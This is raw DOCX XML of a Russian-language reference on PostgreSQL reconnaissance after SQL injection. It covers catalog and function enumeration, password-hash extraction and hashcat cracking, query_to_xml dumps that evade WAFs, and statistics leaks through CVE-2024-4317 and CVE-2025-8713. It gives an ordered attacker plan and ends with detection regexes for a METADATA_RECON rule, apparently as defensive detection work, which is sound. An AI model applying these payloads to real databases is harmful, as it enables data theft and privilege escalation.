        <w:t xml:space="preserve"> (Payload B) после получения superuser — то же про утечку чувствительных данных, но через прямое чтение каталога, не через статистику.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3.8.5</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query_to_xml('SELECT most_common_vals FROM pg_stats WHERE ...', ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — обёртка для компактного дампа всей статистики БД одной командой.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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — после успешной эскалации до superuser весь канал 3.8.6 становится нерелевантным (можно читать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_statistic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> напрямую). 3.8.6 — техника </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">до</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> эскалации.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 (2024)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — полный CVE-2024-4317 advisory, хронология фикса,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детали.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(2025)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — полный CVE-2025-8713 advisory, цепочки эксплуатации.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в regex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">METADATA_RECON</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (3.8.1) добавить ветку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_stats|pg_stats_ext|pg_statistic|pg_statistic_ext|most_common_vals|histogram_bounds</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risk_score = 8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Дополнительно — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE\s+OPERATOR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в любом запросе от не-DBA роли = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">risk_score = 9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (отдельная regex-ветка как маркер Payload C). Сводный regex для всей категории 3.8 — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">summary-3.8.md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Views — pg_stats</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — R17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Views — pg_stats_ext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — R17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System Catalog — pg_statistic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CVE-2024-4317</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — R17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pganalyze: 5min Postgres — CVE-2024-4317 system views</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — R17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CVE-2025-8713</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — R26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GBHackers: critical PostgreSQL flaws (Aug 2025)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — R26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Statistics Used by the Planner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Саммари категории 3.8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В категории 3.8 разобраны шесть векторов разведки и утечки метаданных PostgreSQL — всё, что атакующий извлекает из кластера через системные каталоги и статистику ещё до основной атаки. Это первый шаг почти любой пост-эксплуатации: версия и расширения определяют, какие из остальных категорий применимы; имена таблиц/колонок — содержание UNION-payload-ов для 3.1; SECURITY DEFINER-функции — цели для 3.13; хеши паролей — post-exploitation после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3.8.1 pg_class / pg_namespace / pg_attribute</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — карта схем, таблиц, колонок с типами. PUBLIC. Три payload-карточки (список таблиц, колонки таблицы с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">format_type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как WAF-альтернатива).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3.8.2 pg_proc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — функции, сигнатуры, языки, owner-ы, флаг SECURITY DEFINER, тело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PUBLIC. Две карточки (Payload A — каталог функций с разметкой SECURITY DEFINER + owner=postgres; Payload B — тело конкретной plpgsql-функции через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">regprocedure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-каст). Ключевая асимметрия: для чтения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право EXECUTE не требуется.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3.8.3 pg_authid / pg_shadow / pg_roles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — хеши паролей (SUPERUSER) и карта ролей (PUBLIC). Payload A —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с конкатенацией флагов (super, replication, bypassrls, createrole); Payload B — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_authid.rolpassword</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> после получения SUPERUSER с разбором форматов md5 и SCRAM-SHA-256 (hashcat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-m 12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-m 28600</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Cross-system pivot через переиспользованные пароли.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3.8.4 Fingerprinting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пакетом,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PUBLIC. Первый запрос после получения точки инъекции: версия определяет, какие CVE применимы; пути конфигов — без угадывания дистрибуции; список extension — какие OOB/RCE-векторы из 3.6/3.7 доступны.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3.8.5 query_to_xml / table_to_xml / database_to_xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — массовый дамп одним вызовом. PUBLIC + SELECT на дампируемые объекты. Не privilege bypass — компактность. Обходит WAF-сигнатуры на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(опасный запрос — внутри строкового аргумента функции). Не дополняет привилегии — но экономит подбор UNION и chunked-итерацию.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3.8.6 pg_stats / pg_stats_ext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — утечка через optimizer statistics. Три уровня: baseline (PUBLIC + SELECT на колонку); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">R17 CVE-2024-4317</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> обход колоночного ACL (до 14.12/15.7/16.3, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">бинар-патч не достаточен — нужен `fix-CVE-2024-4317.sql`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">R26 CVE-2025-8713</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> обход view-ACL/RLS через custom operator (до 13.22/14.19/15.14/16.10/17.6).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Сравнение векторов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Что утекает</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Версионная зависимость</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Имена схем/таблиц/колонок с типами</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Любая 14–17</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Функции + тело (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">prosrc</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">) + SECURITY DEFINER</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Любая 14–17</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3.8.3 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Роли + флаги (без хешей)</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Любая 14–17</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3.8.3 B</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Хеши паролей (md5 / SCRAM-SHA-256)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SUPERUSER или </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pg_read_all_data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для </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pg_read_all_data</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Версия, ОС, дистрибуция, GUC, extension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Любая 14–17</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Произвольный SELECT-результат в XML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 SELECT на target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Любая 14–17 (libxml)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3.8.6 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MCV / histogram колонок с SELECT-правом</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 SELECT на колонку</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Любая 14–17</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3.8.6 B (R17)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MCV колонок </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">без</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> SELECT-права</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14.11 / 15.6 / 16.2 (или без </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">fix-CVE-2024-4317.sql</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserv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3.8.6 C (R26)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MCV из view/RLS-таблиц через custom op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схеме</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13.21 / 14.18 / 15.13 / 16.9 / 17.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Типичная последовательность разведки</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Атакующий после получения точки инъекции идёт по следующему ordered-плану:</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3.8.4 Payload A (`version()`)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — мгновенно знает major.minor.OS, отсекает 80% неприменимых CVE.</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3.8.4 Payload B (`pg_settings` пакетом)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — пути конфигов, SSL, log_statement, row_security.</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3.8.4 Payload C (`pg_extension`)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — что установлено: открывает доступ к 3.6 (dblink/postgres_fdw) и 3.7 (plperlu/plpython3u).</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3.8.1 Payload A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — список таблиц приложения; выбор target.</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3.8.1 Payload B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — колонки target с типами для последующих UNION (3.1).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.8.2 Payload A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — SECURITY DEFINER-функции с owner=postgres → цели для 3.13.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.8.6 Payload A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — most_common_vals чувствительных колонок без полного перебора строк.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">8. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.8.3 Payload A (`pg_roles`)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — карта ролей, целевая superuser-роль для 3.13.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Только после этой carte d'identité переходит к собственно эксплуатации (3.1/3.6/3.7/3.13). На непатченных кластерах добавляются шаги 3.8.6 B/C и 3.8.3 B (после 3.13).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">rules.py — готовое правило для класса METADATA_RECON</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
